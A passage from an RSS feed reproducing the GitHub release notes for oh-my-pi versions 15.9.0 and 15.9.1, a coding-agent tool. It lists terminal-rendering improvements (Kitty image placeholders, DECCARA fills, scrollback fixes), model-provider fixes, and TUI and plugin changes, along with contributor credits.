<li>Added Kitty Unicode placeholder image rendering (<code>U=1</code> + U+10EEEE with explicit row/column diacritics): inline images are drawn as real text cells that carry the image id in their foreground color, so they survive horizontal slicing, reflow, and overlapping draws instead of relying on cursor-positioned <code>a=p</code> placements. Enabled by default on Kitty-family terminals; opt out with <code>PI_NO_KITTY_PLACEHOLDERS=1</code>, and falls back to direct placement when a grid exceeds the diacritic table's addressable range.</li>
<li>Added Kitty temp-file image transmission (<code>t=t</code>): on local sessions, decoded PNG bytes are written to a <code>tty-graphics-protocol</code> temp file and the path is sent instead of in-band base64, gated behind a startup <code>a=q,t=t</code> support probe. Controlled by <code>PI_KITTY_IMAGE_TRANSMISSION=direct|temp-file|auto</code>; disabled over SSH unless explicitly forced.</li>
<li>Added DECRQM capability detection for DEC private modes 2026 (synchronized output) and 2048 (in-band resize). Synchronized-output paint wrappers are dropped when the terminal reports 2026 unsupported (preserving the <code>PI_NO_SYNC_OUTPUT</code> override), and DEC 2048 in-band resize is enabled when supported — reported geometry and cell pixel size are updated from <code>CSI 48 ; rows ; cols ; yPx ; xPx t</code> reports, with SIGWINCH and <code>CSI 16 t</code> kept as fallbacks.</li>
<li>Added an injectable render scheduler for TUI tests, allowing deterministic render drains without patching global clocks or event-loop timing.</li>
<li>Added <code>ImageBudget</code>, an inline-image cap that keeps only the most recent N images as live terminal graphics and demotes older ones to their text fallback. Once a new image pushes the count past the cap, the renderer hides the oldest via a full redraw plus an explicit Kitty graphics purge (<code>a=d,d=I</code>) — text-clear escapes (<code>CSI 2 J</code>/<code>CSI 3 J</code>) do not remove Kitty images. Configure the cap via <code>TUI#setMaxInlineImages</code> (<code>0</code> disables it).</li>
<li>Changed Kitty inline images to a transmit-once + placement scheme: the base64 data is sent a single time (<code>a=t</code>) keyed by a stable image id, then every repaint emits only the tiny placement (<code>a=p,i=…,p=…</code>). Repaints — including full redraws — no longer re-send image data or stack duplicate placements, and the diff/line buffers and render caches hold short placement strings instead of multi-KB base64. The <code>ImageBudget</code> doubles as the transmit store (it tracks which ids are loaded and re-transmits after a purge frees the data). iTerm2/Sixel, which have no addressable image store, keep sending inline data as before.</li>
<li>Added a renderer-level DECCARA rectangular-SGR optimizer that paints solid background panels/rows (Box/Text/Markdown fills, status bars, any full-width <code>theme.bg</code> row) as a single coalesced rectangle escape (<code>CSI 2*x</code> / <code>CSI Pt;Pl;Pb;Pr;&lt;sgr&gt;$r</code> / <code>CSI *x</code>) instead of emitting a full-width run of background-styled spaces on every visible row. It operates at emit time on the final ANSI strings — components are unchanged — and strips only trailing padding it can prove sits under a single non-default background span, coalescing vertically adjacent identical fills into one rectangle and falling back to the original bytes whenever the rectangle would not save bytes. Enabled only on Kitty, which implements the SGR-background extension (<code>docs/deccara.rst</code>); <strong>Ghostty is intentionally excluded</strong> because its <code>CSI $r</code> is unimplemented (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="1931418915" data-permission-text="Title is private" data-url="https://github.com/ghostty-org/ghostty/issues/632" data-hovercard-type="issue" data-hovercard-url="/ghostty-org/ghostty/issues/632/hovercard" href="https://github.com/ghostty-org/ghostty/issues/632">ghostty-org/ghostty#632</a>) and would drop the background entirely. Scrollback-bound rows and the append/scroll paths always keep the padded representation so native history preserves colored cells, and the <code>PI_NO_DECCARA</code> kill switch (plus tmux/screen/zellij detection) forces the fallback.</li>
<li>Added <code>CMUX_SURFACE_ID</code> environment variable support to <code>getTerminalId()</code>, so cmux terminal surfaces get a stable identifier alongside kitty, tmux, macOS Terminal.app, and Windows Terminal — enabling per-surface session breadcrumbs for <code>omp -c</code> in cmux.</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Changed TUI tests to use Ghostty's VT engine (<code>ghostty-web</code>) instead of <code>@xterm/headless</code>.</li>
<li>Changed the default inline-image live graphics budget from 3 to 8 images.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>
<p>Fixed the DECCARA background-fill optimizer rejecting or repainting the wrong cells when a trailing fill crossed from default-background spaces into colored spaces.</p>
</li>
<li>
<p>Fixed DEC private-mode reports with DECRPM status 3/4 being treated as unsupported, so permanent 2026/2048 reports stay recognized.</p>
</li>
<li>
<p>Fixed OSC 66 text-sizing width and slicing edge cases, including ZWJ emoji payloads and partial slices through scaled spans.</p>
</li>
<li>
<p>Fixed focused <code>Input</code> components following <code>TUI#setShowHardwareCursor</code>, so single-line prompts render either the terminal cursor or software cursor consistently with the editor.</p>
</li>
<li>
<p>Fixed the DECCARA background-fill optimizer painting fills on the wrong rows ("split into unaligned halves") in the differential repaint path. When a diff grew the transcript past the viewport, writing the rewritten rows scrolled the terminal, but the absolute DECCARA rectangle coordinates were derived from the pre-scroll viewport top, so every fill landed <code>scrollAmount</code> rows too low while the relatively-positioned text settled correctly; rows scrolled into history were also shortened, dropping their background padding from native scrollback. Rectangles now target the post-scroll rows and only rows remaining in the final viewport are optimized.</p>
</li>
<li>
<p>Fixed native scrollback desynchronization after terminal width or height changes reflowed overflowing content while the viewport was not at the bottom</p>
</li>
<li>
<p>Fixed a notification chip (or any injected block) rendering on top of an actively streaming tool render on ED3-risk terminals (Ghostty/kitty/Alacritty/iTerm2). While a foreground tool streams, its header's elapsed-time counter ticks every frame; once output scrolls the header above the viewport top, each tick is an offscreen edit that — because the eager scrollback-rebuild opt-in is gated off on these terminals — repaints the viewport in place and advances the rendered line count without committing the new overflow to native history. <code>#scrollbackHighWater</code> then lagged the logical viewport top, so a later content shrink whose changes landed in the visible region slipped past the shrink-across-boundary guard and reached the differential emitter, which is anchored to <code>#maxLinesRendered - height</code>: it rewrote only the suffix, dropped the newly exposed top row, and left a blank at the bottom, drifting every row below the edit one line up so it painted over the rows above. Such shrinks now re-anchor the bottom of the viewport with a non-destructive repaint, and the foreground-streaming shrink-across-boundary case repaints the live tail instead of padding and pinning the pre-shrink viewport.</p>
</li>
<li>
<p>Fixed a terminal resize during foreground-tool streaming on an unknown-viewport / ED3-risk host (Ghostty/kitty/Alacritty/iTerm2/WSL) leaving native scrollback permanently out of sync, so scrolling back after the turn showed missing rows. A pure geometry resize (no content change) takes the in-place viewport-repaint path, which — unlike a content-bearing resize that rebuilds via the geometry branch — never flagged native history. Because the prompt-submit checkpoint (<code>refreshNativeScrollbackIfDirty</code>) only rebuilds when scrollback is marked dirty on these hosts, the discrepancy was never reconciled. Overflowing geometry repaints whose viewport is not known to be at the bottom now mark scrollback dirty so the next checkpoint rebuilds an exact copy of the transcript.</p>
</li>
</ul>
<h2>@oh-my-pi/pi-utils</h2>
<h3>Added</h3>
<ul>
<li>
<p>Added color helpers <code>colorLuma</code> (perceptual luma), <code>relativeLuminance</code> (WCAG, linearized sRGB), and <code>hslToHex</code> to the color utilities. The luminance helpers parse <code>#rgb</code>/<code>#rrggbb</code> hex and 256-color palette indices, returning <code>undefined</code> for unparseable values.</p>
</li>
<li>
<p>Added <code>peekFileEnds</code>, a single-open head-and-tail file peek helper that reuses the head bytes for the tail when the file fits the head window.</p>
</li>
<li>
<p>Added <code>peekFileTail</code>, the tail mirror of <code>peekFile</code>: reads up to the last <code>maxBytes</code> of a file ending at EOF, reusing the same pooled-buffer strategy (no per-call allocation for small reads).</p>
</li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>fix(search): default paths to workspace root instead of hard-failing by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/GratefulDave/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/GratefulDave">@GratefulDave</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4584846316" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1808" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1808/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1808">#1808</a></li>
<li>fix: recognize disable-model-invocation from Agent Skills spec by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fabkho/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fabkho">@fabkho</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4583326357" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1803" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1803/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1803">#1803</a></li>
<li>fix(coding-agent/mcp): handle async broken-pipe rejections in stdio transport by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/VoidChecksum/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/VoidChecksum">@VoidChecksum</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4578318423" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1783" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1783/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1783">#1783</a></li>
<li>Fix slow agent Opus priority by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/daandden/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/daandden">@daandden</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4576811309" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1754" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1754/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1754">#1754</a></li>
<li>fix(swarm): remove redundant authStorage discovery from swarm pipeline (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4538706917" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1472" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1472/hovercard" href="https://github.com/can1357/oh-my-pi/issues/1472">#1472</a>) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WodenJay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WodenJay">@WodenJay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4573308608" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1726" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1726/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1726">#1726</a></li>
<li>Fix web search provider TUI options by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/daandden/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/daandden">@daandden</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4568591206" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1685" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1685/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1685">#1685</a></li>
<li>Add cmux terminal surface detection to getTerminalId by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/basedcorp99/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/basedcorp99">@basedcorp99</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4570212330" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1702" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1702/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1702">#1702</a></li>
<li>fix(natives): bound sorted glob scans by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4577407079" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1762" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1762/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1762">#1762</a></li>
<li>fix(tui): cap session accent luminance on light themes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/paweljw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/paweljw">@paweljw</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4571800449" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1715" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1715/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1715">#1715</a></li>
<li>feat(coding-agent): env-driven OTLP trace export for headless hosts by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cgreeno/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cgreeno">@cgreeno</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4581802133" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1797" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1797/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1797">#1797</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/GratefulDave/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/GratefulDave">@GratefulDave</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4584846316" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1808" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1808/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1808">#1808</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fabkho/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fabkho">@fabkho</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4583326357" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1803" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1803/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1803">#1803</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WodenJay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WodenJay">@WodenJay</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4573308608" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1726" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1726/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1726">#1726</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/paweljw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/paweljw">@paweljw</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4571800449" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1715" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1715/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1715">#1715</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cgreeno/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cgreeno">@cgreeno</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4581802133" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1797" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1797/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1797">#1797</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/can1357/oh-my-pi/compare/v15.8.3...v15.9.0"><tt>v15.8.3...v15.9.0</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v15.9.1]]></title>
<description><![CDATA[@oh-my-pi/pi-ai
Added

Added regional Xiaomi Token Plan login/provider entries (xiaomi-token-plan-sgp, xiaomi-token-plan-ams, xiaomi-token-plan-cn) so omp login can store token-plan keys against the selected region. (#1846)

Fixed

Removed the context-1m-2025-08-07 (1M long-context) beta from the...]]></description>
<link>https://tsecurity.de/de/3580238/tools/v1591/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580238/tools/v1591/</guid>
<pubDate>Mon, 08 Jun 2026 02:51:01 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>@oh-my-pi/pi-ai</h2>
<h3>Added</h3>
<ul>
<li>Added regional Xiaomi Token Plan login/provider entries (<code>xiaomi-token-plan-sgp</code>, <code>xiaomi-token-plan-ams</code>, <code>xiaomi-token-plan-cn</code>) so <code>omp login</code> can store token-plan keys against the selected region. (<a href="https://github.com/can1357/oh-my-pi/issues/1846" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1846/hovercard">#1846</a>)</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Removed the <code>context-1m-2025-08-07</code> (1M long-context) beta from the Anthropic agent request headers, the OAuth model-discovery header, and the Claude usage-API header. Sending it caused subscription/OAuth requests without long-context credits to fail with <code>429 Usage credits are required for long context requests</code>, breaking Sonnet. The remaining betas are unchanged.</li>
<li>Fixed Kimi K2.x <code>maxTokens</code> on Fireworks and Fire Pass (<code>fireworks/kimi-k2.5</code>, <code>fireworks/kimi-k2.6</code>, <code>firepass/kimi-k2.6-turbo</code>) being inherited from Fireworks <code>/v1/models</code> discovery (<code>max_completion_tokens: 65536</code>) rather than the published Kimi-on-Fireworks output budget, which let callers (and the openai-completions default-injection safety net) ship a budget the router cannot honor and made runaway reasoning traces more likely. The Fireworks resolver now clamps every Kimi K2.x id (public catalog ids and the canonical <code>accounts/fireworks/{models,routers}/kimi-k2…</code> wire form) to 32,768 output tokens, and the generator applies the same cap as a post-processing safety net so the <code>firepass</code> static fallback and the bundled <code>fireworks</code> entries stay in sync across regens. (<a href="https://github.com/can1357/oh-my-pi/issues/1849" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1849/hovercard">#1849</a>)</li>
<li>Fixed Xiaomi Token Plan MiMo OpenAI-compatible tool-call continuations omitting required <code>reasoning_content</code> replay. (<a href="https://github.com/can1357/oh-my-pi/issues/1846" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1846/hovercard">#1846</a>)</li>
<li>Fixed Anthropic prompt caching for OpenAI-compatible Claude proxies by honoring <code>compat.cacheControlFormat: "anthropic"</code> outside OpenRouter. (<a href="https://github.com/can1357/oh-my-pi/issues/1845" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1845/hovercard">#1845</a>)</li>
<li>Fixed Moonshot Kimi K2.6 silently pausing for many seconds between tool calls because the server discarded the <code>reasoning_content</code> that omp was already sending with every assistant tool-call replay. The K2.6 <code>thinking</code> parameter takes an extra <code>keep</code> field whose default (<code>null</code>) ignores historical reasoning, so K2.6 had to re-derive its full chain-of-thought from the user prompt on every iteration of the agent loop. The Moonshot direct (<code>api.moonshot.ai</code>) and Kimi Code (<code>api.kimi.com</code>) wire bodies now send <code>thinking: { type: "enabled", keep: "all" }</code> for <code>kimi-k2.6</code> requests with reasoning enabled, matching Moonshot's documented best practice for multi-step tool-calling agents. The flag is gated on the K2.6 id and the two native hosts because earlier Moonshot models (K2.5 and below) 400 on the unknown field and every Kimi gateway (OpenRouter, OpenCode, Kilo, Fireworks, …) speaks its own thinking shape. (<a href="https://github.com/can1357/oh-my-pi/issues/1838" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1838/hovercard">#1838</a>)</li>
<li>Fixed Alibaba DashScope (Bailian) compatible-mode endpoint <code>400 InternalError.Algo.InvalidParameter: The provided messages input is invalid. The error info is [Unexpected item type in content.]</code> when a screenshot or other image-producing tool result was folded into a known text-only Qwen turn (e.g. <code>qwen3.7-max</code>, <code>qwen-max</code>, <code>qwen3-coder-*</code>) hosted at <code>dashscope.aliyuncs.com/compatible-mode/v1</code>. <code>convertMessages</code> in <code>openai-completions</code> no longer forwards <code>image_url</code> content parts for those text-only id families even when a misconfigured custom provider claims <code>input: ["text", "image"]</code>; multimodal compatible-mode ids such as <code>qwen3.7-plus</code> and <code>qwen-vl-max</code> still rely on the catalog <code>input</code> field. The tool-result branch and the user-content branch both fall back to the standard <code>[image omitted: model does not support vision]</code> placeholder for text-only ids so the model still sees the attachment intent. (<a href="https://github.com/can1357/oh-my-pi/issues/1859" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1859/hovercard">#1859</a>)</li>
</ul>
<h2>@oh-my-pi/pi-coding-agent</h2>
<h3>Added</h3>
<ul>
<li>Added deferred session-title generation so greetings no longer become the session title. A first user message that is only a greeting / acknowledgement / filler ("hi", "thanks", "ok", a bare number, emoji-only, etc.) is now detected deterministically and skips titling entirely — no title model is invoked. Title generation then retries on each subsequent user message while the session stays unnamed, so the title is deduced from the first message that actually describes work. A capable online title model may additionally answer <code>none</code> to decline a non-greeting taskless message (normalized to "no title").</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Changed mid-turn user steers to reach the model inside a wire-only interjection envelope, while transcripts and persisted session history keep the user's original text.</li>
<li>Changed the system prompt to treat user requests for parallel work as <code>task</code> subagent fan-out rather than parallel tool calls.</li>
<li>Changed the Agent Control Center's new-agent description field to use the multiline TUI editor, with Enter inserting lines and Ctrl+Enter generating the spec.</li>
<li>Changed the Agent Control Center and Extension Control Center to accept Left/Right arrow keys for switching tabs (source / provider), in addition to Tab / Shift+Tab — matching the model and settings selectors, whose <code>TabBar</code> already supported arrow navigation.</li>
<li>Refreshed the Ctrl+R history search overlay: the selected row now renders as a full-width <code>selectedBg</code> highlight bar, matched query tokens are highlighted in the accent color, each result shows a right-aligned relative timestamp, and the panel gained an icon'd accent title plus a two-tone keyhint footer. The selector also gained PageUp/PageDown (via the configurable <code>tui.select.pageUp</code>/<code>pageDown</code> keybindings) and Home/End navigation.</li>
<li>Changed Perplexity API-key web search to return more comprehensive results: <code>web_search_options.search_context_size</code> is now <code>high</code> (was <code>medium</code>) for maximum retrieval grounding, the default <code>num_search_results</code> is <code>20</code> (was <code>10</code>) so twice as many sources are surfaced, and <code>return_related_questions</code> is enabled with the response's <code>related_questions</code> now parsed into <code>relatedQuestions</code> (previously dropped). On an identical query this lifted the result from 10 sources / ~410 output tokens to 20 sources / ~1900 output tokens with a structured, multi-section answer; latency tracks model output length, not context size, so the 60s hard timeout headroom is unchanged.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>
<p>Fixed a streamed assistant message freezing at a partial prefix (e.g. only "Nat" of "Natives built, now…") on ED3-risk terminals (Ghostty/kitty/iTerm2/Alacritty), with the final text appearing only after a resize. <code>TranscriptContainer</code> freezes each non-live block by replaying its last live render, but render coalescing can finalize a block's content and append the next block within the same throttled frame — so the block was sealed at its stale mid-stream snapshot and never repainted until the next <code>thaw</code>. The block that was live on the previous render is now recomputed once on the live→frozen transition, sealing it at its final content.</p>
</li>
<li>
<p>Fixed ACP/RPC stdio startup so protocol frames are no longer consumed as one-shot piped prompt input before the JSON-RPC transport starts.</p>
</li>
<li>
<p>Fixed <code>omp completions</code> to await the completion script write before exiting.</p>
</li>
<li>
<p>Fixed <code>AssistantMessageComponent</code> exposing its stable-prefix completion API again so streamed assistant messages remain unstable until explicitly completed.</p>
</li>
<li>
<p>Fixed session restoration to ignore transient fallback model switches (such as automatic context-promotion or retry fallback) so resumed or resumed-switch sessions revert to the configured default model unless the last change was a user-selected temporary model</p>
</li>
<li>
<p>Fixed in-session <code>/resume</code> to restore both the last user-selected temporary model and persisted plan/goal mode state instead of falling back to the default model with plan mode off.</p>
</li>
<li>
<p>Fixed the <code>/resume</code> session picker overflowing short viewports: the visible window was hardcoded to 5 entries (and assumed 3 lines each), but titled sessions render 4 lines, so on a typical-height terminal the picker's header and search box scrolled off the top and the first entry was hidden until you scrolled the terminal up. The visible-entry count is now derived from the live terminal height (budgeting the worst-case 4-line titled entry plus the picker's chrome), so the whole picker fits the viewport and grows on taller terminals.</p>
</li>
<li>
<p>Fixed the Agent Control Center and Extension Control Center dashboards overflowing the terminal: they were mounted inline below the chat transcript, so the combined height exceeded the viewport — the tab bar and controls scrolled off the top into native scrollback, and every state change yanked the view back to the bottom. Both dashboards now render as full-screen overlays sized to the live terminal height (<code>process.stdout.rows</code>), re-fit on resize, fill the viewport, and reserve space for the footer keyhints so the controls stay visible.</p>
</li>
<li>
<p>Fixed Ctrl+R history search results to remain globally sorted by prompt recency after merging FTS prefix matches with substring fallback matches.</p>
</li>
<li>
<p>Fixed Exa web search with no stored or environment credential to use the public Exa MCP fallback again, preserving the auth storage → <code>EXA_API_KEY</code> → <code>mcp.exa.ai</code> resolution order (<a href="https://github.com/can1357/oh-my-pi/issues/1860" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1860/hovercard">#1860</a>).</p>
</li>
<li>
<p>Fixed ACP plan-mode writes to <code>local://PLAN.md</code> so session-local plan artifacts are written to OMP's local artifact root instead of being routed through the editor <code>writeTextFile</code> bridge, avoiding Zen's <code>Internal error</code> and making the plan readable after creation (<a href="https://github.com/can1357/oh-my-pi/issues/1863" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1863/hovercard">#1863</a>).</p>
</li>
<li>
<p>Fixed ACP plan mode stranding the agent at plan approval: entering <code>mode: "plan"</code> now registers a standing <code>resolve</code> handler so the agent's <code>resolve { action: "apply" }</code> no longer fails with <code>No pending action to resolve. Nothing to apply or discard.</code> The handler validates the plan file, asks the ACP client to confirm via <code>unstable_createElicitation</code> when the client supports forms, renames the approved plan to <code>local://&lt;title&gt;.md</code>, and exits plan mode so the agent regains write tools for execution (<a href="https://github.com/can1357/oh-my-pi/issues/1869" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1869/hovercard">#1869</a>).</p>
</li>
<li>
<p>Fixed <code>provider.appendOnlyContext: "auto"</code> staying inactive for Xiaomi Token Plan/SGLang endpoints, preserving prefix-cache hits without forcing append-only mode globally (<a href="https://github.com/can1357/oh-my-pi/issues/1851" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1851/hovercard">#1851</a>).</p>
</li>
<li>
<p>Fixed <code>models.yml</code> compatibility parsing to preserve <code>compat.cacheControlFormat: "anthropic"</code> for custom OpenAI-compatible Claude proxies. (<a href="https://github.com/can1357/oh-my-pi/issues/1845" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1845/hovercard">#1845</a>)</p>
</li>
<li>
<p>Fixed the TUI's <code>Settings → Plugins</code> panel reporting "No plugins installed" when only marketplace plugins were installed. The panel now merges <code>PluginManager.list()</code> with <code>MarketplaceManager.listInstalledPlugins()</code> — the same data source the <code>/plugins list</code> slash command and <code>omp plugin list</code> CLI already used — and tags each row with an <code>[npm]</code> / <code>[marketplace]</code> kind badge, a scope tag, and a shadow indicator for project-shadowed user installs. Selecting a marketplace row opens a new <code>MarketplacePluginDetailComponent</code> whose single <code>Enabled</code> toggle calls <code>MarketplaceManager.setPluginEnabled(pluginId, enabled, scope)</code>, with read-only metadata (version, install path, installed-at, last-updated, git commit SHA) listed below the toggle. The empty-state now lists both install commands (<code>omp plugin install &lt;package&gt;</code> and <code>omp plugin install &lt;name&gt;@&lt;marketplace&gt;</code>) (<a href="https://github.com/can1357/oh-my-pi/issues/1842" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1842/hovercard">#1842</a>).</p>
</li>
<li>
<p>Fixed scoped mnemopi recall in <code>MnemopiSessionState.collectScopedRecallResults</code>/<code>recallResultsScoped</code> to await the async <code>Mnemopi.recallEnhanced</code> so the new auto-derived <code>queryEmbedding</code> flows through. Without this, the embedding-enabled mnemopi backend silently kept running FTS-only on every recall. (<a href="https://github.com/can1357/oh-my-pi/issues/1832" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1832/hovercard">#1832</a>)</p>
</li>
<li>
<p>Fixed the SSH tool renderer inlining multiline remote commands into its single-line status header, which produced a malformed cell where the bordered output block opened mid-command. The renderer now drops the command from the header (which keeps only <code>[host]</code>) and renders the full command in a framed section above <code>Output</code>, mirroring the bash renderer. <code>renderStatusLine</code> also flattens any embedded CR/LF in <code>description</code>, <code>meta</code>, and <code>title</code> so no tool can accidentally expand the header into multiple rows (<a href="https://github.com/can1357/oh-my-pi/issues/1828" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1828/hovercard">#1828</a>).</p>
</li>
<li>
